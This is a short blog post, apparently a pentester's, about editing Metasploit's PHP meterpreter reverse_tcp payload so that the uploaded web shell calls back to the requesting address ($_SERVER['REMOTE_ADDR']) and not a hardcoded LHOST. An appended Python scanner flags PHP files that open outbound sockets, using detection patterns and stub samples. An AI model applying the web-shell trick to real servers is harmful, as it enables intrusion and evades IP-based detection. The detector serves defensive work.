As a Metasploit fan, you always try to integrate any vulnerability you find during a pentest with Metasploit. One of my favourite Metasploit payloads is php/meterpreter/reverse_tcp.
Now, having said that, Metasploit is not really smart!!! (At least it is not efficient in every scenario.)
For example, suppose we generate the php/meterpreter/reverse_tcp payload.
Notice that you always need to specify the LHOST.
This causes an inconvenience if you are in an environment where your IP address keeps changing (for my sake, let's say I hate registering domains, or I am behind a shadowed network).
Checking the payload output
You notice that the reverse remote IP address is hardcoded in the payload.
What we can do is replace the $ip string with the remote address server global, $_SERVER['REMOTE_ADDR'].
Now we can upload it anywhere we want and we don't have to set up our LHOST ever again :). This trick can also be applied to jsp and asp files, but I leave those parts to you guys.
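Looking at the same trick from the defender's side: a web shell whose callback host comes from the request instead of a literal will not show up in a scan that only greps for hard-coded IPs. The following is an added example, not code from the original post, of a small scanner that flags PHP files which open an outbound socket and take the callback host either from a literal assignment or from $_SERVER['REMOTE_ADDR']. The list of socket functions and the three sample PHP snippets are my own constructed assumptions; no stager source is reproduced.

```python
import re

# PHP functions that open an outbound network connection. Assumption: these are
# the usual choices for a reverse-connect stager; extend the list as needed.
SOCKET_FUNCS = re.compile(
    r"\b(fsockopen|pfsockopen|socket_create|stream_socket_client)\s*\(", re.I
)

# Callback host taken from the incoming request rather than a literal.
DYNAMIC_HOST = re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]")

# Callback host assigned as a quoted IPv4 literal, e.g.  $ip = '192.0.2.10';
LITERAL_HOST = re.compile(r"\$\w+\s*=\s*['\"](\d{1,3}(?:\.\d{1,3}){3})['\"]")


def classify(php_source):
    """Return a list of findings for one PHP source string.

    A file is only interesting when it both opens a socket and supplies a
    callback host; REMOTE_ADDR used for logging or display alone is benign.
    """
    findings = []
    if SOCKET_FUNCS.search(php_source):
        if DYNAMIC_HOST.search(php_source):
            findings.append("reverse-connect: callback host taken from REMOTE_ADDR")
        m = LITERAL_HOST.search(php_source)
        if m:
            findings.append(f"reverse-connect: hard-coded callback host {m.group(1)}")
    return findings


def scan_files(files):
    """files: dict of name -> source. Returns only the entries with findings."""
    results = {}
    for name, src in files.items():
        hits = classify(src)
        if hits:
            results[name] = hits
    return results


# Constructed sample files (assumption: minimal stand-ins, not real stagers).
SAMPLES = {
    # benign: REMOTE_ADDR is only echoed back, no socket is opened
    "index.php": "<?php $visitor = $_SERVER['REMOTE_ADDR']; "
                 "echo 'Hello ' . htmlspecialchars($visitor); ?>",
    # hard-coded callback host, as produced by the stock payload
    "hardcoded.php": "<?php $ip = '192.0.2.10'; $port = 4444; "
                     "$s = fsockopen($ip, $port); ?>",
    # dynamic callback host, the modification described in the post
    "dynamic.php": "<?php $ip = $_SERVER['REMOTE_ADDR']; $port = 4444; "
                   "$s = fsockopen($ip, $port); ?>",
}

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        for hit in hits:
            print(f"{name}: {hit}")
```

Run over a real document root by reading each `.php` file into the dict in place of `SAMPLES`; the benign file is skipped because it never opens a socket, while both the stock and the modified payload are reported with the reason.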
2 comments:
I use 0.0.0.0 to bind to all interfaces.
Der, you can use setg.